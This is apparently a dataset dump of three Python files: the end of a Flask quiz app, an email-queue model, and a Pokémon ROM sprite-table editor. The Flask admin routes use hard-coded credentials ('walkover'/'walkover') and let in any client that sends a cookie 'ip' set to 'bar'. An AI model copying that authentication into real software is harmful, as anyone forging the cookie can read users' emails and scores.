\"\n x=question[0]\n question.pop(0)\n option=request.args.get(\"option\")\n try:\n option=int(option)\n except:\n option=0\n if x[\"answer\"]==int(option):\n session['marks']+=1\n #print(session['marks'])\n return redirect('/sub',code=302)\n@app.route('/sub',methods=[\"GET\",\"POST\"])\ndef submit():\n try:\n if session[\"email\"]==\"\":\n return redirect('login',code=302)\n usr1=User()\n usr1.username=session['name']\n usr1.email_address=session['email']\n usr1.marks=session['marks']\n usr1.date=str(datetime.datetime.now())[:18]\n db.session.add(usr1)\n db.session.commit()\n return render_template(\"score.html\",name=session[\"name\"],total=session['marks'])\n except:\n return redirect('/',code=302)\n@app.route('/admin')\ndef adminlog():\n x = Admin_log.query.all()\n fl = 0\n if (request.cookies.get('ip') == \"bar\") :\n fl = 1\n \n if fl:\n return redirect('/admin_check',code=302)\n return render_template(\"adminlogin.html\")\n@app.route('/admin_check',methods=[\"GET\",\"POST\"])\ndef admincheck():\n user = request.form.get(\"username\")\n pswd = request.form.get(\"pswd\")\n \n fl=0\n\n if (request.cookies.get('ip') == \"bar\") :\n fl = 1\n if (user == \"walkover\" and pswd == \"walkover\") or fl:\n session[\"access\"] = 1;\n user = User.query.all()\n user.sort(key=lambda x: x.date, reverse=True)\n mn = []\n for i in user:\n d = {}\n d['username'] = i.username\n d['email_address'] = i.email_address\n d['marks'] = i.marks\n d['date'] = i.date\n mn.append(d)\n # print(len(mn),user)\n session['user'] = mn\n session['pages'] = 1\n session['total'] = -(-len(mn) // 5)\n if fl==0:\n use_ip=Admin_log()\n use_ip.ip=request.environ['REMOTE_ADDR']\n db.session.add(use_ip)\n db.session.commit()\n res = make_response(redirect('/admin-surprise', code=302))\n res.set_cookie('ip', 'bar', expires=datetime.datetime.now() + datetime.timedelta(days=2))\n return res\n #session['ip'].append(request.environ['REMOTE_ADDR'])\n #print(session['ip'])\n return \"

Access Denied

\"\n\n@app.route('/admin-surprise',methods=[\"GET\",\"POST\"])\ndef admin():\n #print(request.environ['REMOTE_ADDR'], 'a')\n mn = request.environ['REMOTE_ADDR']\n #print(mn, session['ip'])\n \n fl = 0\n if (request.cookies.get('ip') == \"bar\") :\n fl = 1\n if (fl):\n session['access'] = 1\n else:\n session['access']=0\n if session[\"access\"] != 1:\n return \"

Access Denied

\"\n user = session['user']\n page = session['pages']\n option = request.args.get(\"option\")\n try:\n option = int(option)\n except:\n option = 0\n if (option == 1):\n page += 1\n elif (option == 2):\n page -= 1\n session['pages'] = page\n # print(page)\n flag = 1\n flag1 = 1\n if (page == 1):\n flag1 = 0\n if (page == session['total']):\n flag = 0\n # print(user)\n return render_template(\"admin.html\", user=user[5 * (page - 1):5 * page], flag=flag, flag1=flag1, page=1)\nif __name__==\"__main__\":\n app.run(debug=False)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"595539052","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport transaction\n\nfrom sqlalchemy import (\n Column,\n Integer,\n String,\n DateTime,\n ForeignKey,\n )\n \nfrom sqlalchemy.orm import (\n relationship,\n )\n \nfrom ..db import (\n Base,\n KJBase,\n DBSession,\n )\n\nfrom ..lib.mailer import Mailer\n\n\nclass EmailQueue(Base, KJBase):\n __tablename__ = 'email_queue'\n\n id = Column(Integer, primary_key=True)\n when_sent = Column(DateTime)\n type = Column(String(2))\n email_to = Column(String(200))\n subject = Column(String(500))\n body = Column(String(5000))\n \n us_id = Column(Integer, ForeignKey('users.id'), index=True)\n user = relationship('User')\n \n @classmethod\n def push(cls, type, user, subject, body):\n email = EmailQueue()\n email.us_id = user.id\n email.type = type\n email.email_to = user.email\n email.subject = subject\n email.body = body \n DBSession.add(email)\n DBSession.flush()\n return email\n \n @classmethod\n def get_emails_to_send(cls):\n return DBSession.query(cls).filter(cls.when_sent == None).all()\n \n def send(self):\n from ..models.user import User\n from ..lib.email_sender import EmailSender\n mailer = Mailer()\n mailer.login()\n res = mailer.send(EmailSender.FROM, self.user.email, self.subject, self.body)\n self.mark_sent()\n \n def mark_sent(self):\n self.when_sent = datetime.datetime.now()\n transaction.commit()\n \n \n\n","sub_path":"kj/models/email_queue.py","file_name":"email_queue.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"54572317","text":"import mmap\r\nfrom core_files.rom_api import *\r\n\r\nTemplateList = ['Template1', 'Template2', 'Template3', 'Template4', 'Template5', 'Template6', 'Template7', 'Template8']\r\n\r\nTemplates = []\r\n\r\nframetype1 = [0x0, 0x1] # [16x32]\r\nframetype2 = [0x0, 0x2] # [32x32]\r\nframetype3 = [0x80, 0x0] # [16x16]\r\nframetype4 = [0x0, 0x8] # [64x64]\r\nframetype5 = [0x0, 0x10] # [128x64] FR Only\r\nframetype6 = [0x80, 0x4] # [48x48] Emerald only\r\nframetype7 = [0x80, 0x5] # [88x32] Emerald only\r\nframetype8 = [0x80, 0x7] # [96x40] Emerald only\r\n\r\n# DEFINES\r\nTBL_0 = 0x0\r\nFREE_SPC = 0x0\r\nFRAMES_PER_OW = 15\r\nFRAMES_END = 0x2135F0\r\n\r\n# This will be used to determin number of frames\r\n# When repointing a table. Used in ow_initializer, repoint_table\r\nFRAMES_PTRS_PTRS = set()\r\n\r\n# ----------------------Functions------------------------------\r\n\r\ndef change_core_info(ow_tbls_ptrs_tbl, files_path):\r\n global TBL_0, FREE_SPC\r\n TBL_0 = ow_tbls_ptrs_tbl\r\n\r\n import os\r\n if os.path.exists(files_path):\r\n global TemplateList\r\n\r\n for i in range(0, 8):\r\n path = files_path + TemplateList[i]\r\n\r\n temp = open(path, 'r+b')\r\n template = mmap.mmap(temp.fileno(), 0)\r\n Templates.append(template)\r\n\r\ndef update_free_space(size, start_addr=FREE_SPC):\r\n global FREE_SPC\r\n FREE_SPC = find_free_space(size, start_addr, 2)\r\n\r\ndef find_free_space_update(size, start_addr=0, ending=0):\r\n addr = find_free_space(size, start_addr, ending)\r\n # Update the Free Space addr\r\n global FREE_SPC\r\n FREE_SPC = addr + size\r\n return addr\r\n\r\ndef is_ow_data(addr):\r\n # Checks various bytes to see if they are the same with the templates\r\n try:\r\n if read_byte(addr + 0x0) != 0xFF: return 0\r\n if read_byte(addr + 0x1) != 0xFF: return 0\r\n\r\n if not is_ptr(addr + 0x10): return 0\r\n if not is_ptr(addr + 0x14): return 0\r\n if not is_ptr(addr + 0x18): return 0\r\n if not is_ptr(addr + 0x1c): return 0\r\n if not is_ptr(addr + 0x20): return 0\r\n except IndexError:\r\n return 0\r\n return 1\r\n\r\ndef is_orig_table_ptr(addr):\r\n # Check if it is a Vanilla Table 1 (OW Data Pointers)\r\n if not is_ptr(addr): return 0\r\n\r\n ow_data_ptr = ptr_to_addr(addr)\r\n if not is_ptr(ow_data_ptr): return 0\r\n\r\n ow_data = ptr_to_addr(ow_data_ptr)\r\n if not is_ow_data(ow_data): return 0\r\n\r\n frames_ptrs = ptr_to_addr(ow_data + 0x1C)\r\n if not is_frames_ptr(frames_ptrs): return 0\r\n return 1\r\n\r\ndef is_owm_table_ptr(addr):\r\n # Check if it is a Vanilla Table 1 (OW Data Pointers)\r\n if not is_ptr(addr): return 0\r\n ow_data_ptr = ptr_to_addr(addr)\r\n end_of_table = ow_data_ptr + 256 * 4\r\n\r\n # Check for OWM's signature\r\n if not is_ptr(end_of_table): return 0\r\n if not is_ptr(end_of_table + 4): return 0\r\n if not is_ptr(end_of_table + 8): return 0\r\n\r\n # Check if the pointers are valid\r\n if read_word(ow_data_ptr) == 0x11111111: return 1\r\n if not is_ow_data_ptr(ow_data_ptr):\r\n return 0\r\n else:\r\n return 1\r\n\r\ndef is_table_ptr(addr):\r\n # Used to check if addr is a ptr to OW Data Pointers Table\r\n return is_orig_table_ptr(addr) or is_owm_table_ptr(addr)\r\n\r\ndef is_jpan_ptr(addr):\r\n # If JPAN's patch was applied, then there should be a pointer in a\r\n # routine somewhere that points to the new Table 0 (0x1A2000 default addr)\r\n if not is_ptr(addr): return 0\r\n maybe_tbl = ptr_to_addr(addr)\r\n if not is_table_ptr(maybe_tbl): return 0\r\n\r\n # Finally in Table 0 it should either have pointers to Table 1 or 0x00\r\n if read_word(maybe_tbl + 4) == 0x0: return 1\r\n if is_table_ptr(maybe_tbl + 4): return 1\r\n return 0\r\n\r\ndef is_ow_data_ptr(addr):\r\n return is_ptr(addr) and is_ow_data(ptr_to_addr(addr))\r\n\r\ndef is_frames_end(addr):\r\n global FRAMES_END\r\n\r\n if ptr_to_addr(addr) == FRAMES_END:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef sublist(pattern, mylist):\r\n matches = []\r\n for i in range(len(mylist)):\r\n if mylist[i] == pattern[0] and mylist[i:i+len(pattern)] == pattern:\r\n return 1\r\n return 0\r\n\r\ndef table_needs_repoint(addr):\r\n ow_ptr = ptr_to_addr(addr)\r\n end_of_table = ow_ptr + 256 * 4\r\n\r\n if read_word(ptr_to_addr(end_of_table)) == 0x22222222:\r\n return 0\r\n\r\n if not is_ow_data(ptr_to_addr(end_of_table)):\r\n return 1\r\n\r\n if not is_ptr(end_of_table + 4):\r\n return 1\r\n\r\n if read_word(ptr_to_addr(end_of_table + 4)) == 0x33333333:\r\n return 0\r\n\r\n if not is_frames_ptr(ptr_to_addr(end_of_table + 4)):\r\n return 1\r\n\r\n return 0\r\n\r\ndef update_frames_addr(num, addr, ow_type):\r\n for i in range(1, num + 1):\r\n addr += get_frame_size(ow_type)\r\n return addr\r\n\r\ndef get_frame_size(ow_type):\r\n if ow_type == 1:\r\n return 256 # 0x100\r\n if ow_type == 2:\r\n return 512 # 0x200\r\n if ow_type == 3:\r\n return 128 # 0x80\r\n if ow_type == 4:\r\n return 2048 # 0x800\r\n if ow_type == 5:\r\n return 4096 # 0x1000\r\n if ow_type == 6:\r\n return 1152 # 0x480\r\n if ow_type == 7:\r\n return 1408 # 0x580\r\n if ow_type == 8:\r\n return 1920 # 0x780\r\n\r\ndef clear_frames(addr, frames, size):\r\n # first check if FRAMES_END is inside the data (overlay: happens with 0xFFs)\r\n if sublist([0xF0, 0x35, 0x21, 0x08], read_bytes(addr, frames*size)):\r\n write_word(addr + frames*size, 0xFFFFFFFF)\r\n print(\"WARNING: Found a colision\")\r\n return\r\n\r\n fill_with_data(addr, frames * size, 0xFF)\r\n print(HEX(addr))\r\n write_word(addr, 0xFFFFFFFF)\r\n\r\ndef available_frames_ptr_addr(addr, num_of_frames):\r\n rom.seek(addr)\r\n\r\n for i in range(1, (num_of_frames * 8) + 1):\r\n if rom.read_byte() != 0x33:\r\n return 0\r\n return 1\r\n\r\ndef write_frames_end(addr):\r\n global FRAMES_END\r\n write_ptr(FRAMES_END, addr)\r\n\r\ndef get_frame_dimensions(ow_type):\r\n if ow_type == 1:\r\n width = 16\r\n height = 32\r\n elif ow_type == 2:\r\n width = 32\r\n height = 32\r\n elif ow_type == 3:\r\n width = 16\r\n height = 16\r\n elif ow_type == 4:\r\n width = 64\r\n height = 64\r\n elif ow_type == 5:\r\n width = 128\r\n height = 64\r\n elif ow_type == 6:\r\n width = 48\r\n height = 48\r\n elif ow_type == 7:\r\n width = 88\r\n height = 32\r\n elif ow_type == 8:\r\n width = 96\r\n height = 40\r\n\r\n return width, height\r\n\r\ndef get_template(ow_type):\r\n return Templates[ow_type - 1]\r\n\r\ndef get_ow_palette_id(addr):\r\n rom.seek(addr + 2)\r\n byte1 = rom.read_byte()\r\n byte2 = rom.read_byte()\r\n\r\n return (byte2 * 256) + byte1\r\n\r\ndef addrs_filter(new_table, ow_data_addr, frames_ptrs, frames_addr):\r\n # 0xA000 is ~ 256 * (4 + 36 + FRAMES_PER_OW * 8)\r\n if new_table == 0:\r\n new_table = find_free_space_update((260 * 4), FREE_SPC, 4) # 3 more for the table's info + 1 for rounding\r\n else:\r\n new_table = find_free_space((260 * 4), new_table, 4)\r\n\r\n if ow_data_addr == 0:\r\n ow_data_addr = find_free_space_update((256 * 36) + 4, new_table + 259 * 4, 4)\r\n else:\r\n ow_data_addr = find_free_space((256 * 36) + 4, ow_data_addr, 4)\r\n\r\n if frames_ptrs == 0:\r\n frames_ptrs = find_free_space_update((9 * 8 * 256) + 4, ow_data_addr + (256 * 36) + 4, 4)\r\n else:\r\n frames_ptrs = find_free_space((9 * 8 * 256) + 4, frames_addr, 4)\r\n\r\n if frames_addr == 0:\r\n frames_addr = find_free_space_update(0x40000, frames_ptrs + (9 * 8 * 256) + 4, 2)\r\n else:\r\n frames_addr = find_free_space(0x40000, frames_addr, 2)\r\n\r\n print(\"Found Addresses: {} {} {} {}\".format(HEX(new_table),HEX(ow_data_addr),HEX(frames_ptrs),HEX(frames_addr)))\r\n return new_table, ow_data_addr, frames_ptrs, frames_addr\r\n\r\ndef write_ow_palette_id(addr, palette_id):\r\n rom.seek(addr + 2)\r\n byte1 = int(palette_id / 256)\r\n byte2 = int(palette_id % 256)\r\n\r\n rom.write_byte(byte2)\r\n rom.write_byte(byte1)\r\n rom.flush()\r\n\r\ndef is_frames_ptr(addr):\r\n check1 = is_ptr(addr)\r\n\r\n # It checks first the type of the frames from the data next to the ptr\r\n frame = []\r\n\r\n rom.seek(addr + 4)\r\n frame = [rom.read_byte(), rom.read_byte()]\r\n\r\n if frame == frametype1:\r\n tp = 1\r\n elif frame == frametype2:\r\n tp = 2\r\n elif frame == frametype3:\r\n tp = 3\r\n elif frame == frametype4:\r\n tp = 4\r\n elif frame == frametype5:\r\n tp = 5\r\n elif frame == frametype6:\r\n tp = 6\r\n elif frame == frametype7:\r\n tp = 7\r\n elif frame == frametype8:\r\n tp = 8\r\n else:\r\n tp = 0\r\n\r\n if tp != 0:\r\n tp = 1\r\n return tp * check1\r\n\r\ndef get_palette_slot(data_addr):\r\n rom.seek(data_addr + 12)\r\n slot_compressed = rom.read_byte()\r\n\r\n return int(slot_compressed % 16)\r\n\r\ndef write_palette_slot(data_addr, palette_slot):\r\n rom.seek(data_addr + 12)\r\n byte = rom.read_byte()\r\n\r\n byte1 = int(byte / 16)\r\n slot = (byte1 * 16) + palette_slot\r\n rom.seek(data_addr + 12)\r\n rom.write_byte(slot)\r\n rom.flush()\r\n\r\ndef get_animation_addr(ow_data_addr):\r\n data_tuple = [0, 0]\r\n data_tuple[0] = ptr_to_addr(ow_data_addr + 0x18)\r\n data_tuple[1] = ptr_to_addr(ow_data_addr + 0x20)\r\n return data_tuple\r\n\r\ndef write_animation_ptr(ow_data_addr, data_tuple):\r\n write_ptr(data_tuple[0], ow_data_addr + 0x18)\r\n write_ptr(data_tuple[1], ow_data_addr + 0x20)\r\n\r\ndef get_text_color(ow_data_addr):\r\n return read_byte(ow_data_addr + 0xE)\r\n\r\ndef set_text_color(ow_data_addr, val):\r\n write_byte(ow_data_addr + 0xE, val)\r\n\r\ndef get_footprint(ow_data_addr):\r\n return read_byte(ow_data_addr + 13)\r\n\r\ndef set_footprint(ow_data_addr, val):\r\n write_byte(ow_data_addr + 13, val)\r\n\r\n# -----------------Classes--------------------\r\n\r\nclass FramesPointers:\r\n frames_ptrs_addr = 0x0\r\n frames_addr = 0x0\r\n frames_ptrs_addr_start = 0x0\r\n frames_addr_start = 0x0\r\n\r\n def __init__(self, frames_ptrs_addr=0x0, frames_addr=0x0, frames_ptrs_addr_start=0,\r\n frames_addr_start=0):\r\n self.frames_ptrs_addr = frames_ptrs_addr\r\n self.frames_addr = frames_addr\r\n self.frames_ptrs_addr_start = frames_ptrs_addr_start\r\n self.frames_addr_start = frames_addr_start\r\n\r\n def add_frames_ptrs(self, ow_type, num_of_frames):\r\n\r\n frames_addr = self.find_frames_free_space(ow_type, num_of_frames)\r\n frames_ptrs_addr = self.find_available_frames_ptrs_addr(num_of_frames)\r\n # Write changes to the class' variables\r\n self.frames_ptrs_addr = frames_ptrs_addr\r\n self.frames_addr = frames_addr\r\n\r\n # Initialize the actual data of the frames\r\n fill_with_data(frames_addr, num_of_frames * get_frame_size(ow_type), -1)\r\n # Write the frame_end prefix\r\n write_ptr(FRAMES_END, frames_addr + num_of_frames * get_frame_size(ow_type))\r\n\r\n self.write_frames_ptrs(ow_type, num_of_frames)\r\n\r\n def find_frames_free_space(self, ow_type, frames_num, addr=0):\r\n\r\n working_addr = self.frames_addr_start\r\n if addr != 0:\r\n working_addr = addr\r\n\r\n frame_size = get_frame_size(ow_type)\r\n size = frame_size * frames_num\r\n # working_addr = find_free_space(size + 4, working_addr, 2)\r\n working_addr = find_free_space(size + 4, working_addr, 2)\r\n\r\n return working_addr\r\n\r\n def find_available_frames_ptrs_addr(self, frames_num):\r\n working_addr = self.frames_ptrs_addr_start\r\n\r\n while 1:\r\n if available_frames_ptr_addr(working_addr, frames_num) == 1:\r\n return working_addr\r\n else:\r\n working_addr += 8\r\n\r\n def write_frames_ptrs(self, ow_type, frames_num):\r\n\r\n frame_ptr_addr = self.frames_ptrs_addr\r\n frame_addr = self.frames_addr\r\n\r\n frametype = []\r\n if ow_type == 1:\r\n frametype = frametype1\r\n elif ow_type == 2:\r\n frametype = frametype2\r\n elif ow_type == 3:\r\n frametype = frametype3\r\n elif ow_type == 4:\r\n frametype = frametype4\r\n elif ow_type == 5:\r\n frametype = frametype5\r\n elif ow_type == 6:\r\n frametype = frametype6\r\n elif ow_type == 7:\r\n frametype = frametype7\r\n elif ow_type == 8:\r\n frametype = frametype8\r\n\r\n # Write the frames Pointers\r\n for i in range(0, frames_num):\r\n write_ptr(frame_addr, frame_ptr_addr)\r\n write_bytes(frame_ptr_addr + 4, frametype + [0x0, 0x0])\r\n\r\n frame_ptr_addr += 8\r\n frame_addr += get_frame_size(ow_type)\r\n\r\n def repoint_frames(self, new_frames_addr):\r\n\r\n frames_num = self.get_num()\r\n ow_type = self.get_type()\r\n\r\n new_addr = self.find_frames_free_space(ow_type, frames_num, new_frames_addr)\r\n\r\n def get_type(self):\r\n # It checks first the type of the frames from the data next to the ptr\r\n frame = []\r\n\r\n rom.seek(self.frames_ptrs_addr + 4)\r\n frame = [rom.read_byte(), rom.read_byte()]\r\n\r\n tp = -1\r\n if frame == frametype1:\r\n tp = 1\r\n elif frame == frametype2:\r\n tp = 2\r\n elif frame == frametype3:\r\n tp = 3\r\n elif frame == frametype4:\r\n tp = 4\r\n elif frame == frametype5:\r\n tp = 5\r\n elif frame == frametype6:\r\n tp = 6\r\n elif frame == frametype7:\r\n tp = 7\r\n elif frame == frametype8:\r\n tp = 8\r\n\r\n # if tp == -1:\r\n # print(\"get_type: Cant find type for \" + HEX_LST(frame))\r\n # print(HEX_LST(read_bytes(self.frames_ptrs_addr, 8)))\r\n return tp\r\n\r\n def get_num(self):\r\n ow_type = self.get_type()\r\n size = get_frame_size(ow_type)\r\n\r\n # Reads the total number of bytes\r\n addr = self.frames_addr\r\n i = 0\r\n while is_frames_end(addr) != 1:\r\n i += 1\r\n addr += size\r\n\r\n # if (addr == 0xc6921a):\r\n # print(\"HELLOOOOO\")\r\n return i\r\n\r\n def clear(self):\r\n ow_type = self.get_type()\r\n frames_num = self.get_num()\r\n\r\n # Clear the ptrs addr\r\n fill_with_data(self.frames_ptrs_addr, frames_num * 8, 0x33)\r\n # Clear the actual data of the frames, watch out for overlays\r\n clear_frames(self.frames_addr, frames_num, get_frame_size(ow_type))\r\n\r\nclass OWData:\r\n ow_ptr_addr = 0x0\r\n ow_data_addr = 0x0\r\n ow_data_addr_start = 0x0\r\n frames = FramesPointers()\r\n\r\n def __init__(self, ow_data_addr, ptr_addr, ow_data_addr_start):\r\n self.ow_data_addr = ow_data_addr\r\n self.ow_ptr_addr = ptr_addr\r\n self.ow_data_addr_start = ow_data_addr_start\r\n\r\n def add_ow_data(self, ow_type, frames_ptrs_addr):\r\n # Type 1: The hero, Type 2: Hero Bike, Type 3: Lil girl\r\n template = get_template(ow_type)\r\n\r\n ow_data_addr = self.find_available_ow_data_addr()\r\n self.ow_data_addr = ow_data_addr\r\n\r\n rom.seek(ow_data_addr)\r\n template.seek(0)\r\n for i in range(0x24):\r\n rom.write_byte(template.read_byte())\r\n\r\n # Write the ptr to the frames\r\n write_ptr(frames_ptrs_addr, ow_data_addr + 0x1c)\r\n\r\n def find_available_ow_data_addr(self):\r\n\r\n working_addr = self.ow_data_addr_start\r\n\r\n while 1:\r\n if is_ow_data(working_addr) == 0:\r\n return working_addr\r\n else:\r\n working_addr += 0x24\r\n\r\n def clear(self):\r\n self.frames.clear()\r\n fill_with_data(self.ow_data_addr, 36, 0x22) # 0x22 = 34\r\n\r\n def remove(self):\r\n # Clear itself\r\n self.clear()\r\n # Clear the ow_ptr\r\n fill_with_data(self.ow_ptr_addr, 4, 0x22) # 0x22\r\n\r\n def move_left(self):\r\n # Move the OW Data left\r\n move_data(self.ow_data_addr, self.ow_data_addr - 36, 36, 0x22) # 0x22\r\n # Change the ow_ptr to point to the new addr\r\n write_ptr(self.ow_data_addr - 36, self.ow_ptr_addr)\r\n # Move the OW Pointer left\r\n move_data(self.ow_ptr_addr, self.ow_ptr_addr - 4, 4, 0x22) # 0x22\r\n\r\n def move_right(self):\r\n\r\n # Move the OW Data right\r\n move_data(self.ow_data_addr, self.ow_data_addr + 36, 36, 0x22) # 0x22\r\n\r\n # Change the ow_ptr to point to the new addr\r\n write_ptr(self.ow_data_addr + 36, self.ow_ptr_addr)\r\n\r\n # Move the OW Pointer right\r\n move_data(self.ow_ptr_addr, self.ow_ptr_addr + 4, 4, 0x22) # 0x22\r\n\r\nclass OWPointerTable:\r\n table_ptr_addr = 0\r\n table_addr = 0x0\r\n ow_data_ptrs = []\r\n\r\n ow_data_addr = 0x0\r\n frames_ptrs_addr = 0x0\r\n frames_addr = 0x0\r\n end_of_table = 0x0\r\n\r\n def __init__(self, table_ptr_addr, table_addr, ow_data_addr, frames_ptrs, frames_addr):\r\n self.table_ptr_addr = table_ptr_addr\r\n self.table_addr = table_addr\r\n self.ow_data_addr = ow_data_addr\r\n self.frames_ptrs_addr = frames_ptrs\r\n self.frames_addr = frames_addr\r\n self.ow_data_ptrs = []\r\n self.end_of_table = table_addr + (256 * 4)\r\n\r\n # Checks if the table was already there\r\n if ptr_to_addr(self.table_addr) == 0xFFFFFF:\r\n # fill with bytes the OW Data Pointers Table,\r\n # OW Data Table and Frames Pointers Table(~20 frames/ow)\r\n fill_with_data(self.table_addr, 256 * 4, 0x11)\r\n fill_with_data(self.ow_data_addr, 256 * 36, 0x22)\r\n fill_with_data(self.frames_ptrs_addr, 256 * 8 * FRAMES_PER_OW, 0x33)\r\n\r\n # Write the table's info\r\n print(\"\\ntbl_init: OW Pointers(WR): \"+HEX(self.table_addr))\r\n print(\"tbl_init: OW Data(WR): \"+HEX(self.ow_data_addr))\r\n print(\"tbl_init: Frames Pointers(WR): \"+HEX(self.frames_ptrs_addr))\r\n print(\"tbl_init: Frames Address(WR): \"+HEX(self.frames_addr))\r\n write_ptr(self.ow_data_addr, self.end_of_table)\r\n write_ptr(self.frames_ptrs_addr, self.end_of_table + 4)\r\n write_ptr(self.frames_addr, self.end_of_table + 8)\r\n\r\n check_addr = self.table_addr\r\n while is_ptr(check_addr) and check_addr != self.end_of_table:\r\n # There is an OW ptr\r\n self.ow_data_ptrs.append(self.ow_initializer(check_addr))\r\n check_addr += 4\r\n\r\n def ow_initializer(self, ow_ptr):\r\n ow_data_addr = ptr_to_addr(ow_ptr)\r\n frames_ptrs_addr = ptr_to_addr(ow_data_addr + 0x1C)\r\n frames_addr = ptr_to_addr(frames_ptrs_addr)\r\n FRAMES_PTRS_PTRS.add(frames_ptrs_addr)\r\n\r\n # Create the Frames OBJ\r\n FramesOBJ = FramesPointers(frames_ptrs_addr, frames_addr,\r\n self.frames_ptrs_addr, self.frames_addr)\r\n\r\n # Create the OW Data OBJ\r\n OWDataOBJ = OWData(ow_data_addr, ow_ptr, self.ow_data_addr)\r\n OWDataOBJ.frames = FramesOBJ\r\n\r\n return OWDataOBJ\r\n\r\n def find_available_ow_ptr(self):\r\n working_addr = self.table_addr\r\n\r\n while 1:\r\n if is_ptr(working_addr) == 0:\r\n return working_addr\r\n else:\r\n working_addr += 4\r\n\r\n def re_initialize_ow(self):\r\n # Re-initialize the ow_ptrs\r\n self.ow_data_ptrs = []\r\n\r\n check_addr = self.table_addr\r\n while 1:\r\n if is_ptr(check_addr) == 1:\r\n # Checks if its the end of the table\r\n if check_addr == self.end_of_table:\r\n break\r\n # There is an OW ptr\r\n self.ow_data_ptrs.append(self.ow_initializer(check_addr))\r\n check_addr += 4\r\n else:\r\n break\r\n\r\n def add_ow(self, ow_type, num_of_frames):\r\n\r\n # First create the frames\r\n FramesOBJ = FramesPointers(0, 0, self.frames_ptrs_addr, self.frames_addr)\r\n FramesOBJ.add_frames_ptrs(ow_type, num_of_frames)\r\n\r\n # Create OW Data\r\n ow_ptr = self.find_available_ow_ptr()\r\n\r\n OWDataOBJ = OWData(0, ow_ptr, self.ow_data_addr)\r\n OWDataOBJ.add_ow_data(ow_type, FramesOBJ.frames_ptrs_addr)\r\n OWDataOBJ.frames = FramesOBJ\r\n\r\n # Write the OW Pointer in the Table\r\n write_ptr(OWDataOBJ.ow_data_addr, ow_ptr)\r\n\r\n # Re-initialise the ow ptrs\r\n self.re_initialize_ow()\r\n\r\n write_palette_slot(self.ow_data_ptrs[-1].ow_data_addr, 0xA)\r\n\r\n def remove_ow(self, ow_id):\r\n length = len(self.ow_data_ptrs)\r\n\r\n # Removes the data of the OW and changes all the ptrs\r\n self.ow_data_ptrs[ow_id].remove()\r\n\r\n for i in range(ow_id, length):\r\n # Without that if statement it would try to move_left the ow_data_ptrs[length]\r\n if i != length - 1:\r\n self.ow_data_ptrs[i + 1].move_left()\r\n\r\n # Re-initialize the ow_ptrs\r\n self.re_initialize_ow()\r\n\r\n def insert_ow(self, pos, ow_type, num_of_frames):\r\n # Get number of OWs\r\n l = len(self.ow_data_ptrs)\r\n\r\n # Move the data and the ptrs of all the OWs to the right\r\n for i in range(l - 1, pos - 1, -1):\r\n self.ow_data_ptrs[i].move_right()\r\n\r\n # Insert the new OW\r\n self.add_ow(ow_type, num_of_frames)\r\n\r\n # Re-initialize the ow_ptrs\r\n self.re_initialize_ow()\r\n\r\n def resize_ow(self, pos, ow_type, num_of_frames):\r\n # Get info\r\n ow_data_addr = self.ow_data_ptrs[pos].ow_data_addr\r\n animation_ptr = get_animation_addr(ow_data_addr)\r\n palette_slot = get_palette_slot(ow_data_addr)\r\n footprint_byte = read_byte(ow_data_addr + 13)\r\n\r\n self.ow_data_ptrs[pos].remove()\r\n self.add_ow(ow_type, num_of_frames)\r\n\r\n # Restore Info\r\n write_animation_ptr(ow_data_addr, animation_ptr)\r\n write_palette_slot(ow_data_addr, palette_slot)\r\n write_byte(ow_data_addr + 13, footprint_byte)\r\n\r\n # Re-initialise the ow ptrs\r\n self.re_initialize_ow()\r\n\r\nclass Root:\r\n ow_tables_addr = 0x0 # Talbe 0\r\n ow_tables_addrs = [] # [ptr:Table 2] or Table 1's entries\r\n tables_list = []\r\n\r\n def __init__(self):\r\n # Don't initialize in case a rom is not loaded\r\n if rom.rom_contents is None:\r\n return\r\n\r\n self.tables_list = []\r\n self.ow_tables_addr = TBL_0\r\n FRAMES_PTRS_PTRS = set()\r\n\r\n # Get addresses of OW Data Pointers Tables (Table 1)\r\n addr = self.ow_tables_addr\r\n ow_tbls_addrs = [] #[ptr:Table 1] or Table 0's entries\r\n while is_table_ptr(addr):\r\n if ptr_to_addr(addr) in [0x39FFB0, 0x39FEB0]:\r\n fill_with_data(addr, 4, 0)\r\n continue\r\n ow_tbls_addrs.append(addr)\r\n self.ow_tables_addrs.append(ptr_to_addr(addr))\r\n addr += 4\r\n\r\n for addr in ow_tbls_addrs:\r\n print(\"\\nroot: About to check: {} ({})\".format(HEX(addr), HEX(ptr_to_addr(addr))))\r\n if table_needs_repoint(addr):\r\n # If it was the first table, change any pointer in the\r\n # ROM that might be pointing to it\r\n if addr == self.ow_tables_addr:\r\n SHOW(\"Searching for Pointers for the Default OW Table\")\r\n ptrs = find_ptr_in_rom(ptr_to_addr(addr), True)\r\n self.repoint_table(addr)\r\n for ptr in ptrs:\r\n write_ptr(ptr_to_addr(addr), ptr)\r\n else:\r\n self.repoint_table(addr)\r\n else:\r\n table_ptr_addr = addr\r\n table_addr = ptr_to_addr(addr)\r\n end_of_table = table_addr + (256 * 4)\r\n ow_data_addr = ptr_to_addr(end_of_table)\r\n frames_ptrs = ptr_to_addr(end_of_table + 4)\r\n frames_addr = ptr_to_addr(end_of_table + 8)\r\n SHOW(\"Loading Table (\"+HEX(table_addr)+\")\")\r\n print(\"root: Tables Table: \"+HEX(table_ptr_addr))\r\n print(\"root: Table: \" + HEX(ptr_to_addr(self.ow_tables_addr)))\r\n print(\"root: OW Data: \"+HEX(ow_data_addr))\r\n print(\"root: Frames Pointers: \"+HEX(frames_ptrs))\r\n print(\"root: Frames Address: \"+HEX(frames_addr))\r\n # Create the Table Object\r\n ptr_tbl_obj = OWPointerTable(table_ptr_addr, table_addr,\r\n ow_data_addr, frames_ptrs, frames_addr)\r\n self.tables_list.append(ptr_tbl_obj)\r\n\r\n print(\"\\nroot: About to check: {} ({})\".format(HEX(addr), HEX(ptr_to_addr(addr))))\r\n print(\"\\nroot: Not a ptr: {} ({})\".format(HEX(addr), HEX(ptr_to_addr(addr))))\r\n\r\n def reload(self):\r\n self.tables_list = []\r\n self.ow_tables_addr = TBL_0\r\n\r\n # Get addresses of OW Data Pointers Tables (Table 1)\r\n addr = self.ow_tables_addr\r\n ow_tbls_addrs = [] #[ptr:Table 1] or Table 0's entries\r\n while is_table_ptr(addr):\r\n 